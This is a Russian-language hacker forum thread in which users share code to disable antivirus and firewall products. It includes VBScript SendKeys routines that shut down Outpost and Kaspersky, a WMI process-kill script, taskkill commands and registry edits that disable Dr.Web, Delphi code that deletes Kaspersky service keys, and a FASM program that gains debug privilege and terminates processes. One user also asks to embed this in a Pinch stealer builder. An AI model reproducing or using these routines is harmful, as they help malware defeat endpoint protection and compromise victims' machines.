Нужен скрипт.

[Fallen]

Собственно сабж.
Нужен скрипт для убийства процессов - nod32kui.exe , Kaspersky.exe желательно на .*vbs.Хотя сойдет любой (можно палящийся)
Пример: Для вырубания Outpost'а нужен следующий скрипт:

set WShell = CreateObject("WScript.Shell")

WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe"
WScript.Sleep 200
WShell.AppActivate "Agnitum", TRUE
WScript.Sleep 100
WShell.SendKeys "{F10}{DOWN}{UP}{ENTER}"
WScript.Sleep 100
WShell.SendKeys "{ENTER}"

Кому не жалко выкладываем

 

[ammok]

Fallen
Отрубив nod32kui.exe антивирь все равно будет блокировать зараженный файл (не даст его запустить, переместить и скопировать)

З.Ы. Тебе надо сервис вырубать, чтоб это сделать изучи "АнИнсталлер"

 

[Fallen]

Да я все понимаю.Это я к примеру привел nod32kui мне нужно для любого процесса.А там я разберусь как сделать чтобы отубал то что надо!Ибо сам на NOD32
Собственно нашел что хотел.

' ProcessKillLocal.vbs

Option Explicit
Dim objWMIService, objProcess, colProcess
Dim strComputer, strProcessKill 
strComputer = "."
strProcessKill = "'calc.exe'" 

Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" _ 
& strComputer & "\root\cimv2") 

Set colProcess = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = " & strProcessKill )
For Each objProcess in colProcess
objProcess.Terminate()
Next 
WSCript.Echo "Just killed process " & strProcessKill _
& " on " & strComputer
WScript.Quit 
' End of WMI Example of a Kill Process

Где strProcessKill = "'calc.exe'" вместо calc.exe пишем название процесса который надо убить _) и сохраняем с разрешением .vbs

 

[Маринка]

ну на сччет vbs я только учу

а так не пробовал :

kill_pproc.cmd

taskkill /F /IM nod32kui.exe
exit

?
Добавлено в [time]1147276677[/time]
у меня процесс успешно был зхавершен

 

[Robin Gud]

Выгружает каспера humbsup:

procedure DisableAVP;

procedure DisableAVP; const KAVMonitorService='KAVMonitorService';

      ServiceSectionKAVMonitorService=ServiceSection+KAVMonitorService; HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\KAVMonitorService

      AVPCC='AVPCC';

      ServiceSectionAVPCC=ServiceSection+AVPCC; HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AVPCC

      ServiceSectionAVP5=ServiceSection+'kavsvc'; HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kavsvc

      s_Enum='\Enum';

      s_Security='\Security';

var i: Integer;

begin 

  i:=ReadInteger(HKEY_LOCAL_MACHINE, ServiceSectionKAVMonitorService, s_Start, ReturnDataType);

  if i>0 then begin     RegDeleteKey(HKEY_LOCAL_MACHINE, ServiceSectionKAVMonitorService+s_Enum);

    RegDeleteKey(HKEY_LOCAL_MACHINE, ServiceSectionKAVMonitorService+s_Security);

    if RegDeleteKey(HKEY_LOCAL_MACHINE, ServiceSectionKAVMonitorService)=ERROR_SUCCESS then begin

      BlockKeyForever(HKEY_LOCAL_MACHINE, ServiceSectionKAVMonitorService);

      LogInf(KAVMonitorService+sDeleted+'  '+IntToStr(i)) end else

      LogInf(KAVMonitorService+sNOT+sDeleted+' '+IntToStr(i));

  end;

  i:=ReadInteger(HKEY_LOCAL_MACHINE, ServiceSectionAVPCC, s_Start, ReturnDataType);

  if i>0 then begin

    RegDeleteKey(HKEY_LOCAL_MACHINE, ServiceSectionAVPCC+s_Enum);

    RegDeleteKey(HKEY_LOCAL_MACHINE, ServiceSectionAVPCC+s_Security);

    if RegDeleteKey(HKEY_LOCAL_MACHINE, ServiceSectionAVPCC)=ERROR_SUCCESS then begin

      BlockKeyForever(HKEY_LOCAL_MACHINE, ServiceSectionAVPCC);

      LogInf(AVPCC+sDeleted+' '+IntToStr(i)) end else

      LogInf(AVPCC+sNOT+sDeleted+' '+IntToStr(i));

  end;

 

  i:=ReadInteger(HKEY_LOCAL_MACHINE, ServiceSectionAVP5, s_Start, ReturnDataType);

  if i>0 then begin     RegDeleteKey(HKEY_LOCAL_MACHINE, ServiceSectionAVP5+s_Enum);

    RegDeleteKey(HKEY_LOCAL_MACHINE, ServiceSectionAVP5+s_Security);

    if RegDeleteKey(HKEY_LOCAL_MACHINE, ServiceSectionAVP5)=ERROR_SUCCESS then begin

      BlockKeyForever(HKEY_LOCAL_MACHINE, ServiceSectionAVP5);

      LogInf('AVP5'+sDeleted+' '+IntToStr(i)) end else

      LogInf('AVP5'+sNOT+sDeleted+' '+IntToStr(i));

  end;

end; 
 

function BlockKeyForever(RootKey: HKEY; SubKey: string): Boolean;

function BlockKeyForever(RootKey: HKEY; SubKey: string): Boolean; var hKey1: HKEY; 

begin   Result:=False;

  RegDeleteKey(RootKey, PChar(SubKey));

  Result:=(RegCreateKeyEx(RootKey, PChar(SubKey), 0, nil,

    REG_OPTION_CREATE_LINK, KEY_SET_VALUE OR KEY_CREATE_SUB_KEY, nil, hKey1, nil)=ERROR_SUCCESS);

  RegCloseKey(HKey1);

end;

 

[Fallen]

Robin Gud
Выгрузка каспера не пашет.Специально поставил Каспера и проверил.

 

[Dude03]

Выгрузка каспера не пашет.Специально поставил Каспера и проверил.

Перезагрузиться пробовал?

 

[Ŧ1LAN]

set WShell = CreateObject("WScript.Shell")

WShell.Exec "C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 6.0\avp.exe"
WScript.Sleep 200
WShell.AppActivate "Kaspersky", TRUE
WScript.Sleep 100
WShell.SendKeys "{F10}{DOWN}{UP}{ENTER}"
WScript.Sleep 100
WShell.SendKeys "{ENTER}"

 

[Sam05]

Да. С Каспером и NODом все нормально. А c Norton Antivirus 2005 не катит. Блокирует гад.

 

[aivus]

Я пробовал на каспере 5.0.273 он его конечно видит
но тут проблемка когда я вырубаю постоянную защиту
Этот код:

set WShell = CreateObject("WScript.Shell")
WShell.Exec "C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Personal\kav.exe"
WScript.Sleep 200
WShell.AppActivate "Agnitum", TRUE
WScript.Sleep 100
WShell.SendKeys "{F10}{DOWN}{UP}{UP}{ENTER}"
WScript.Sleep 100
WShell.SendKeys "{ENTER}"

Его не выгружает, а просто вытягивает из трея и обратно запускает.


З.Ы. Может ошибка сдесь?

WShell.AppActivate "Agnitum", TRUE

 

[Sam05]

aivus

Попробуй по другому.

 set WShell = CreateObject("WScript.Shell")

      WShell.Exec "C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Personal\kav.exe"
      WScript.Sleep 100
      WShell.AppActivate "Kaspersky", TRUE
      WScript.Sleep 10
      WShell.SendKeys "{F10}{LEFT}{LEFT}{LEFT}"
      WScript.Sleep 10
      WShell.SendKeys "{DOWN}{DOWN}{DOWN}{DOWN}{ENTER}"

      WScript.Sleep 10
      WShell.SendKeys "a{ENTER}"
      WScript.Sleep 10
      WShell.SendKeys "{F10}{LEFT}{DOWN}"
      WScript.Sleep 10
      WShell.SendKeys "n"

Для DrWeb

taskkill /IM spidernt.exe /F /T
taskkill /IM spiderml.exe /F /T
taskkill /IM drwebscd.exe /F /T

Отключение службы реестре:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\spidernt]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\spidernt]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\spidernt]
"Start"=dword:00000004

Убираем из реестра:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"DrWebScheduler"="C:\\Program Files\\DrWeb\\DRWEBSCD.EXE"
"SpIDerMail"="\"C:\\Program Files\\DrWeb\\spiderml.exe\""
"SpIDerNT"="C:\\PROGRA~1\\DrWeb\\spidernt.exe /agent"

 

[aivus]

aivus

Попробуй по другому.

set WShell = CreateObject("WScript.Shell")

     WShell.Exec "C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Personal\kav.exe"
     WScript.Sleep 100
     WShell.AppActivate "Kaspersky", TRUE
     WScript.Sleep 10
     WShell.SendKeys "{F10}{LEFT}{LEFT}{LEFT}"
     WScript.Sleep 10
     WShell.SendKeys "{DOWN}{DOWN}{DOWN}{DOWN}{ENTER}"

     WScript.Sleep 10
     WShell.SendKeys "a{ENTER}"
     WScript.Sleep 10
     WShell.SendKeys "{F10}{LEFT}{DOWN}"
     WScript.Sleep 10
     WShell.SendKeys "n"

Я думаю что нужно как-то через трей, потому что в любот случае когда выбираешь ALT+F4 оно его спускает в трей, а когда с трея убираешь сервис выгружается.
Это возможно сделать??? <_<

 

[Маринка]

собственно не скрипт

а сорец на masm

Программа обхода всех процессов в системе и удаления антивирусных процессов.

список процессов есно легко редактируется
_http://vx.netlux.org/tpoc/Files/avers.zip

 

[...ъХ...]

Был бы это макрос каторый можно было подключить в билдер пинча к примеру, было бы офигенно, хотя мне кажеться это не так сложно сделать

Я кстати откампилить сорец не могу чёт, c INCLUDE alex.inc косяк, не хочет подключать не в какую, по разному пробывал

 

[Маринка]

как ты указывал путь к файлу?
как компилировал ?

 

[...ъХ...]

Так include ..\INCLUDE\alex.inc и так полный путь disk:\...\...\INCLUDE\alex.inc

Компилю обычно, беру код и запихиваю в fasmw.exe, нажимаю Run

 

[salamandra]

Ты учиться мало мальски видимо совсем не хочеш!Синтаксис фасм от масм отличить до сих пор не можеш!

 

[...ъХ...]

Опана, salamandra ты и тут зависаеш=))
На самом деле хочу и учусь, но незнаю хорошо ни одного языка, а начинать с ASM это не самый лучший вариант, так что пока делфи шлифую понемногу)
А вот что masm я с fasm перепутал, это конеш ппц :huh1:

 

[...ъХ...]

А исходнички то кривоваты!

 

[salamandra]

:P Компельни как это и сразу поймёш на каком принципе это действует!

format PE GUI 4.0
include 'include\win32a.inc'

entry start
;---------------------------------------------------------------------------------
TOKEN_QUERY_TOKEN_ADJUST_PRIVILEGES =28h

struct PROCESSENTRY32
dwSize dd ?
cntUsage dd ?
th32ProcessID dd ?
th32DefaultHeapID dd ?
th32ModuleID dd ?
cntThreads dd ?
th32ParentProcessID dd ?
pcPriClassBase dd ?
dwFlags dd ?
szExeFile db MAX_PATH dup(?)
ends


PrivilegeCount dd ?
pLocalId dd ?
chtoto dd ?
Attributes dd ?
phToken dd ?
hSnapshot dd ?
prcs PROCESSENTRY32

PrcList db 'csrss.exe',0
Privilege db 'SeDebugPrivilege',0


start: invoke GetCurrentProcess
invoke OpenProcessToken,eax,TOKEN_QUERY_TOKEN_ADJUST_PRIVILEGES,phToken
invoke LookupPrivilegeValue,0,Privilege ,pLocalId
mov dword[PrivilegeCount],1
mov dword[Attributes],2
invoke AdjustTokenPrivileges,[phToken],0,PrivilegeCount ,0,0,0

mov [prcs.dwSize],sizeof.PROCESSENTRY32
invoke CreateToolhelp32Snapshot, TH32CS_SNAPPROCESS, 0
mov [hSnapshot], eax
invoke Process32First,[hSnapshot],prcs
f: mov edi,PrcList
invoke StrStrI,prcs.szExeFile, edi
cmp eax,0
je _NextProc
call kill


_NextProc:
invoke Process32Next,[hSnapshot],prcs
cmp eax,0
jne f
invoke ExitProcess,0
kill: invoke OpenProcess,PROCESS_TERMINATE,0,[prcs.th32ProcessID]
invoke TerminateProcess,eax,0
retn

data import

library kernel32,'KERNEL32.DLL',\
advapi32,'ADVAPI32.DLL',\
shell32,'SHELL32.DLL'


include 'include\APIA\kernel32.inc'
include 'include\APIA\advapi32.inc'
include 'include\APIA\shell32.inc'
end data